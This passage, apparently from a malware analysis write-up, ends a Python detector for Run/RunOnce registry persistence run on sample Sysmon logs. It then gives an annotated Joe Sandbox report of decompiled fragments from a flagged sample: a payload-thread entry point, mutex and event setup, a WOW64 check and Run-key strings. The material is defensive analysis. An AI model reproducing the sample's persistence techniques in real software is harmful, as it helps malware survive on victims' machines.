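    r"|TargetObject=HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce",
    r"EventID=13|EventType=SetValue|Image=C:\Users\victim\Downloads\invoice.exe"
    r"|TargetObject=HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\Installer"
    r"|Details=C:\Users\victim\AppData\Local\Temp\inst.exe",
]

if __name__ == "__main__":
    for hit in find_run_key_persistence(SAMPLE_LOG):
        print(f"{hit['image']} wrote {hit['key']}\\{hit['value_name']} -> {hit['command']}")
```

The Program Files / Windows filter only lowers priority; a writable subdirectory under those trees would slip past it, so in production pair this with the writing process's own path and signature status rather than relying on the target directory alone.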

                                      APIs
                                        • Part of subcall function 00CC9317: GetEnvironmentStringsW.KERNEL32 ref: 00CC9320
                                        • Part of subcall function 00CC9317: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CC9343
                                        • Part of subcall function 00CC9317: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00CC9369
                                        • Part of subcall function 00CC9317: _free.LIBCMT ref: 00CC937C
                                        • Part of subcall function 00CC9317: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CC938B
                                      • _free.LIBCMT ref: 00CC4E3C
                                      • _free.LIBCMT ref: 00CC4E43
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                      • String ID:
                                      • API String ID: 400815659-0
                                      • Opcode ID: 57abde0edee1b90e25933472dd27adb161346918d5c6e6a1f952641042c4f26e
                                      • Instruction ID: 85bb03a1ec37dd4b33fd6d45772707084c7bd663f78c1d6eb28469dce183436d
                                      • Opcode Fuzzy Hash: 57abde0edee1b90e25933472dd27adb161346918d5c6e6a1f952641042c4f26e
                                      • Instruction Fuzzy Hash: 5DE02B2790962241E326267EEC12F6F52416B81335B57831FFC20C72D2DEA08C0211E5
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      APIs
                                        • Part of subcall function 00CC249C: try_get_function.LIBVCRUNTIME ref: 00CC24B1
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CC22CE
                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00CC22D9
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                      • String ID:
                                      • API String ID: 806969131-0
                                      • Opcode ID: d4aad0c8b3ae979ecf12ca41f69b70cbdd25183451872b2b547de451ccc0fde8
                                      • Instruction ID: 8b46b3009c11416d055dc4e80fbe6525adb43aa2c91db4fd86f8381e468ffa42
                                      • Opcode Fuzzy Hash: d4aad0c8b3ae979ecf12ca41f69b70cbdd25183451872b2b547de451ccc0fde8
                                      • Instruction Fuzzy Hash: 08D02228C08312182D083AB4FC02FAE23449A227B23B0074EE030CA0C2EF108204303A
                                      Uniqueness

                                      Uniqueness Score: 0.34%

                                      C-Code - Quality: 100%
                                      			E0043FB09(signed int _a4) {
                                      
                                      				Sleep(1); // executed
                                      				return GetTickCount() * (1 + _a4 * 0x359) % 0x2710;
                                      			}



                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CountSleepTick
                                      • String ID:
                                      • API String ID: 2804873075-0
                                      • Opcode ID: 370db7e7fc4b6ece0a8d274b51a76040b4424d6fb9d01a44416feadff5563f7a
                                      • Instruction ID: b9316f9715dbc92c23b42676d379b039cfea1dc5c6dde9137c724e2641931a46
                                      • Opcode Fuzzy Hash: 370db7e7fc4b6ece0a8d274b51a76040b4424d6fb9d01a44416feadff5563f7a
                                      • Instruction Fuzzy Hash: 99D0A9342481044BE30C9B0AFE4E2613A4EC7C2301F00803BF20EC90A0C9A155904458
                                      Uniqueness

                                      Uniqueness Score: 1.69%

                                      C-Code - Quality: 100%
                                      			E0043E221(void** __ecx) {
                                      				int _t2;
                                      				void** _t4;
                                      
                                      				_t4 = __ecx;
                                      				ReleaseMutex( *__ecx);
                                      				_t2 = CloseHandle( *_t4); // executed
                                      				return _t2;
                                      			}





                                      APIs
                                      • ReleaseMutex.KERNEL32(?,?,0043DE9B,?,00435774,?,00000000,00000000,00000000,00000000,?,0000000A,?,?,00000000,.bss), ref: 0043E226
                                      • CloseHandle.KERNEL32(?), ref: 0043E22E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleMutexRelease
                                      • String ID:
                                      • API String ID: 4207627910-0
                                      • Opcode ID: 1644dc8f955d0cf500b1cc342ac13ed98a0ce272508d8cd64e4d11a00b23e16a
                                      • Instruction ID: 83d4cf42ec45fb5cf043d240c95feeaf4e309a74ff8fafb4305d4332fd7fc796
                                      • Opcode Fuzzy Hash: 1644dc8f955d0cf500b1cc342ac13ed98a0ce272508d8cd64e4d11a00b23e16a
                                      • Instruction Fuzzy Hash: D4B0923E000020DFEB212F94FD0C8957BA5FF0A35135904BAF281811388BE20C519B84
                                      Uniqueness

                                      Uniqueness Score: 23.02%

                                      C-Code - Quality: 100%
                                      			E00435A87(long __ecx) {
                                      				void* _t2;
                                      
                                      				_t2 = RtlAllocateHeap(GetProcessHeap(), 0, __ecx); // executed
                                      				return _t2;
                                      			}




                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,?,00432DD7,?,?,?,0043E39B,?,004358E9,?,?,00000000,?,004355D2,00000000), ref: 00435A8A
                                      • RtlAllocateHeap.NTDLL(00000000,?,0043E39B,?,004358E9,?,?,00000000,?,004355D2,00000000,?,?,00000000), ref: 00435A91
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcess
                                      • String ID:
                                      • API String ID: 1357844191-0
                                      • Opcode ID: 9d6ff2e64fab0177e10ba47913dff2e9bf70e92c8370c64ebf802ea774eef30c
                                      • Instruction ID: 3283e0cb2668388f01a694b234acd9d416791b44e7d6155fef376f31b540ae65
                                      • Opcode Fuzzy Hash: 9d6ff2e64fab0177e10ba47913dff2e9bf70e92c8370c64ebf802ea774eef30c
                                      • Instruction Fuzzy Hash: BEA001B9954240AFEE846BA1AE0EB1A3A28AB46702F944568B316860A09AE554008A39
                                      Uniqueness

                                      Uniqueness Score: 0.01%

                                      C-Code - Quality: 100%
                                      			E00435A76(void* __ecx) {
                                      				int _t2;
                                      
                                      				_t2 = HeapFree(GetProcessHeap(), 0, __ecx); // executed
                                      				return _t2;
                                      			}




                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,?,00435A61,00432DD7,?,?,?,0043E39B,?,004358E9,?,?,00000000,?,004355D2,00000000), ref: 00435A79
                                      • HeapFree.KERNEL32(00000000,?,0043E39B), ref: 00435A80
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: 7156914f1ba5fd906b6926df68c7eba75dde61265bb5c900d70b96fe17b82f2a
                                      • Instruction ID: 5f068dc4b799136c40c3a03553572b82dc3b579f41ad65ac20123b5f1956b7ba
                                      • Opcode Fuzzy Hash: 7156914f1ba5fd906b6926df68c7eba75dde61265bb5c900d70b96fe17b82f2a
                                      • Instruction Fuzzy Hash: 80A002B55541405FDD445BA19F0EB1539289B46703F444554B3159505195F454008635
                                      Uniqueness

                                      Uniqueness Score: 0.01%

                                      APIs
                                        • Part of subcall function 00CC622D: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00CC7957,00000001,00000364,00000004,000000FF,?,?,?,00CC621F,00CC47EE), ref: 00CC626E
                                      • _free.LIBCMT ref: 00CC94D9
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: AllocateHeap_free
                                      • String ID:
                                      • API String ID: 614378929-0
                                      • Opcode ID: 17a7c154d6bf4ed951418ce08b6c764d8d70667bd326596135f291e8ce38b01d
                                      • Instruction ID: da143a3c4c3477d2fbd3e0b8426932c04a0f3eac795e039ee2d428b3b423c4e9
                                      • Opcode Fuzzy Hash: 17a7c154d6bf4ed951418ce08b6c764d8d70667bd326596135f291e8ce38b01d
                                      • Instruction Fuzzy Hash: 9501F977200305ABE325CF65D845E5AFBDDFB89370F250A6DE594932C0EA70A906C774
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00CC7957,00000001,00000364,00000004,000000FF,?,?,?,00CC621F,00CC47EE), ref: 00CC626E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 6bfc759032f26152e861165e1dd05bd63c120a5e787c18b8bc91cd0d1e3b6bc6
                                      • Instruction ID: 393561e40e6b5ab3671206b484b0a4d3c8c591d1f6068a9278a49b4fd10de1e9
                                      • Opcode Fuzzy Hash: 6bfc759032f26152e861165e1dd05bd63c120a5e787c18b8bc91cd0d1e3b6bc6
                                      • Instruction Fuzzy Hash: CAF0E23264822067DF316F62CE05F6B775CAF45770B14811DEC24EA290CB30ED0196E0
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      C-Code - Quality: 100%
                                      			E00433001(WCHAR** __ecx, WCHAR** __edx, void* __eflags) {
                                      				short _v1028;
                                      				WCHAR** _t14;
                                      				WCHAR** _t15;
                                      
                                      				_t15 = __edx;
                                      				_t14 = __ecx;
                                      				E00431052( &_v1028, 0, 0x400);
                                      				ExpandEnvironmentStringsW( *_t15,  &_v1028, 0x1ff);
                                      				E00433412(_t14,  &_v1028); // executed
                                      				return _t14;
                                      			}






                                      APIs
                                      • ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00433034
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$EnvironmentExpandStringslstrcpy
                                      • String ID:
                                      • API String ID: 1709970682-0
                                      • Opcode ID: bd97a94b6263f2ce9abe470818145cdfb2ebbe88521c5753a7468b3aff19ace5
                                      • Instruction ID: 7bb744d929eb1ab5bdabfe564106d2a51295e699e407aa5c4a386e7a79c31d22
                                      • Opcode Fuzzy Hash: bd97a94b6263f2ce9abe470818145cdfb2ebbe88521c5753a7468b3aff19ace5
                                      • Instruction Fuzzy Hash: A6E048B6B0011967DB20A7169C06F96776DEBC4718F050079B719F31D0E9B4DE4A8AA8
                                      Uniqueness

                                      Uniqueness Score: 0.14%

                                      C-Code - Quality: 87%
                                      			E0043D425(signed int* __ecx) {
                                      				char _v8;
                                      				WCHAR* _t3;
                                      				void* _t5;
                                      				signed int* _t15;
                                      				WCHAR* _t18; // declaration added: the decompiler output used this temporary without declaring it
                                      
                                      				_push(__ecx);
                                      				_t15 = __ecx;
                                      				_t3 = E00435ADB(0x7d0);
                                      				 *__ecx =  *__ecx & 0x00000000;
                                      				_t18 = _t3;
                                      				GetModuleFileNameW(0, _t3, 0x3e8);
                                      				_t5 = E00433412( &_v8, _t18); // executed
                                      				E00433264(_t15, _t5); // executed
                                      				E00435A2D(_v8);
                                      				return _t15;
                                      			}







                                      APIs
                                        • Part of subcall function 00435ADB: GetProcessHeap.KERNEL32(00000000,000000F4,0043E415,?,?,00000000,004355C4,?,?,00000000), ref: 00435ADE
                                        • Part of subcall function 00435ADB: HeapAlloc.KERNEL32(00000000,?,00000000,004355C4,?,?,00000000), ref: 00435AE5
                                      • GetModuleFileNameW.KERNEL32(00000000,00000000,000003E8,?,00000000,?,?,0043F41F,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows), ref: 0043D444
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                        • Part of subcall function 00433264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00433289
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heaplstrcpylstrlen$AllocFileFreeModuleNameProcessVirtual
                                      • String ID:
                                      • API String ID: 1499825812-0
                                      • Opcode ID: ea98810d96be9925fa2bed455edbfb443980f29e4806d90bf4194c61d34fd33d
                                      • Instruction ID: 5fb82810f78d98bd0308a36868cca944dec911ff13f0e12bc69c32a478657f33
                                      • Opcode Fuzzy Hash: ea98810d96be9925fa2bed455edbfb443980f29e4806d90bf4194c61d34fd33d
                                      • Instruction Fuzzy Hash: 31E0DF6270411067D604B75AEC57BAE76ADCFD5326F00102AF206E21C1DEA81E0096A4
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      C-Code - Quality: 100%
                                      			E00433162(WCHAR** __ecx, void* __eflags, WCHAR** _a4) {
                                      				void* _t4;
                                      				WCHAR* _t6;
                                      				WCHAR** _t8;
                                      				WCHAR** _t14;
                                      
                                      				_t14 = _a4;
                                      				_t8 = __ecx;
                                      				_t4 = E0043308E(_t14);
                                      				_t6 = E004359CE( *((intOrPtr*)(__ecx)), 4 + (_t4 + E0043308E(__ecx)) * 2); // executed
                                      				 *_t8 = _t6;
                                      				return lstrcatW(_t6,  *_t14);
                                      			}







                                      APIs
                                        • Part of subcall function 0043308E: lstrlenW.KERNEL32(?,00433473,?,?,?,0043F311,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00433095
                                      • lstrcatW.KERNEL32(00000000,?), ref: 00433192
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcatlstrlen
                                      • String ID:
                                      • API String ID: 1475610065-0
                                      • Opcode ID: ea7cfcebfb4f43efa963f33747c844fc265e5ffab383160c086aec746bd9a370
                                      • Instruction ID: a9181061572a930b6fe2c31e6855c9d2018cb24e38f785aaa2a9a7c0d05e9d27
                                      • Opcode Fuzzy Hash: ea7cfcebfb4f43efa963f33747c844fc265e5ffab383160c086aec746bd9a370
                                      • Instruction Fuzzy Hash: 49E020722002105BCB156F67DC8496D776DEF89360B00003FF505CB215DA755C00C6D5
                                      Uniqueness

                                      Uniqueness Score: 1.37%

                                      C-Code - Quality: 100%
			// Builds the event name as an ANSI string in the object's second field (E00432F52 wraps
			// lstrcatA), then creates a named, manual-reset (bManualReset = 1), initially
			// non-signalled event and stores the handle in the first field. A named event can be
			// opened by other processes in the same session, so it also serves as a shared signal.
			E0043DD40(intOrPtr* __ecx, CHAR** _a4) {
				intOrPtr* _t10;

				_t10 = __ecx;
				E00432F52(__ecx + 4, _a4); // executed
				 *_t10 = CreateEventA(0, 1, 0,  *(_t10 + 4)); // (lpEventAttributes, bManualReset, bInitialState, lpName)
				return 1;
			}

			Instruction addresses for the listing above: 0x0043dd48, 0x0043dd4d, 0x0043dd61, 0x0043dd69

                                      APIs
                                        • Part of subcall function 00432F52: lstrcatA.KERNEL32(00000000,?,?,00000000,?,004333F1,00000000,00000000,?,00434AC0,?,?,?,?,?), ref: 00432F7E
                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,?,?), ref: 0043DD5B
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateEventlstrcat
                                      • String ID:
                                      • API String ID: 2275612694-0
                                      • Opcode ID: 4257faf867405c4d7a2d05bcb66409146c8fefaa8db40ceb512509aa93e75506
                                      • Instruction ID: 1e846c2848de2d676acca6aa92a86d52a2545da47ee5588aa39ce269c33b3ced
                                      • Opcode Fuzzy Hash: 4257faf867405c4d7a2d05bcb66409146c8fefaa8db40ceb512509aa93e75506
                                      • Instruction Fuzzy Hash: CBD02E322082017BD300AB91DD02F82BF29FB61720F008036F20882580CBB1A420CB94
                                      Uniqueness

                                      Uniqueness Score: 1.31%

                                      C-Code - Quality: 100%
			// Entry point of the mapped image, DllMain-style: the second argument (_a8) is decremented
			// and compared with zero, which matches fdwReason == DLL_PROCESS_ATTACH (1). The payload
			// routine E0043586A is started on its own thread and the entry point returns TRUE at
			// once, so the loader is never blocked by the payload.
			_entry_(char _a8) {

				_t1 =  &_a8;
				 *_t1 = _a8 - 1;
				if( *_t1 == 0) { // fdwReason == DLL_PROCESS_ATTACH
					CreateThread(0, 0, E0043586A, 0, 0, 0); // executed; E0043586A is the thread start routine
				}
				return 1;
			}

			Instruction addresses for the listing above: 0x00440e21, 0x00440e21, 0x00440e25, 0x00440e33, 0x00440e33, 0x00440e3d

                                      APIs
                                      • CreateThread.KERNEL32(00000000,00000000,0043586A,00000000,00000000,00000000), ref: 00440E33
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread
                                      • String ID:
                                      • API String ID: 2422867632-0
                                      • Opcode ID: 8be525c5326fa9497debc5ba38d01b95b54e652623d0fb2360faed028b5bf9cf
                                      • Instruction ID: 8e24e0651c7bad808e00da9906f516a0fc18d97b3e0ccfdc77b1386fd3def3ca
                                      • Opcode Fuzzy Hash: 8be525c5326fa9497debc5ba38d01b95b54e652623d0fb2360faed028b5bf9cf
                                      • Instruction Fuzzy Hash: 7DC08CB1650208BFB7046BB22C08C7773DCDB25211B40C832BF05C2400D578CC348A38
                                      Uniqueness

                                      Uniqueness Score: 0.06%

                                      C-Code - Quality: 100%
			// Creates an unnamed, initially unowned mutex (CreateMutexA(NULL, FALSE, NULL)), stores
			// the handle in the first field and records handle != INVALID_HANDLE_VALUE in the second.
			// Caveat when reading that check: CreateMutexA reports failure with NULL, not with
			// INVALID_HANDLE_VALUE, so the flag is 1 even when the call failed.
			E0043E236(void** __ecx) {
				void* _t5;
				void** _t10;

				_t10 = __ecx;
				_t5 = CreateMutexA(0, 0, 0); // executed
				 *_t10 = _t5;
				_t10[1] = 0 | _t5 != 0xffffffff; // "valid handle" flag, see caveat above
				return _t10;
			}

			Instruction addresses for the listing above: 0x0043e239, 0x0043e23e, 0x0043e246, 0x0043e250, 0x0043e254

                                      APIs
                                      • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,0043DE7C,?,?,0043E3F7,?,?,00000000,004355C4,?,?,00000000), ref: 0043E23E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateMutex
                                      • String ID:
                                      • API String ID: 1964310414-0
                                      • Opcode ID: d26dd2637229af083a2367407f5c6c63c8eeccf774f00faa61f0083c0a591099
                                      • Instruction ID: ce7fb562abeac0db39c43ca7a2d996d90b94c16f13397e9e5aa0fb7eddb302e0
                                      • Opcode Fuzzy Hash: d26dd2637229af083a2367407f5c6c63c8eeccf774f00faa61f0083c0a591099
                                      • Instruction Fuzzy Hash: 07D012B15005205FE3249F395C08867B5DDDF99720315CF39B4A5C71D4E5708C408760
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      C-Code - Quality: 50%
			// WOW64 check. E0043EBD4 resolves IsWow64Process at run time (GetModuleHandleA("kernel32")
			// plus GetProcAddress, see the APIs list below) and calls it on the current process
			// handle. Resolving it dynamically keeps the name out of the import table and avoids a
			// load failure on Windows versions that lack the export. The sbb/neg sequence folds the
			// result into a 0/1 value.
			E0043DBF3(void* __ecx) {
				char _v8;
				signed int _t4;

				_push(__ecx);
				_v8 = GetCurrentProcess(); // pseudo-handle of the current process
				_t4 = E0043EBD4( &_v8); // executed
				asm("sbb eax, eax");
				return  ~( ~_t4); // normalised to 0 or 1
			}

			Instruction addresses for the listing above: 0x0043dbf6, 0x0043dc00, 0x0043dc03, 0x0043dc0a, 0x0043dc0f

                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?,00432BBD,?,00442608,?,?,00000000,?,?,?), ref: 0043DBF7
                                        • Part of subcall function 0043EBD4: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,0043DC08,?,?,00432BBD,?,00442608,?,?,00000000,?), ref: 0043EBE9
                                        • Part of subcall function 0043EBD4: GetProcAddress.KERNEL32(00000000,?,0043DC08,?,?,00432BBD,?,00442608,?,?,00000000,?), ref: 0043EBF0
                                        • Part of subcall function 0043EBD4: IsWow64Process.KERNEL32(?,00000000,?,0043DC08,?,?,00432BBD,?,00442608,?,?,00000000,?), ref: 0043EC00
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AddressCurrentHandleModuleProcWow64
                                      • String ID:
                                      • API String ID: 1745181078-0
                                      • Opcode ID: 9994b54500e1972c2762c543b231f9dc8189c89cbb4cff8d702faca297beb779
                                      • Instruction ID: 3f8b737b9976352375bbc444fceb0f8697ad7de8232c111277dd34f734a4dc9d
                                      • Opcode Fuzzy Hash: 9994b54500e1972c2762c543b231f9dc8189c89cbb4cff8d702faca297beb779
                                      • Instruction Fuzzy Hash: 0AC08C3085030EABCF10EFB6C90585EB7E89A05208B400668A003D31D0EE74EB08C644
                                      Uniqueness

                                      Uniqueness Score: 0.43%

                                      APIs
                                      • SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 0043D715
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateDirectory
                                      • String ID:
                                      • API String ID: 4241100979-0
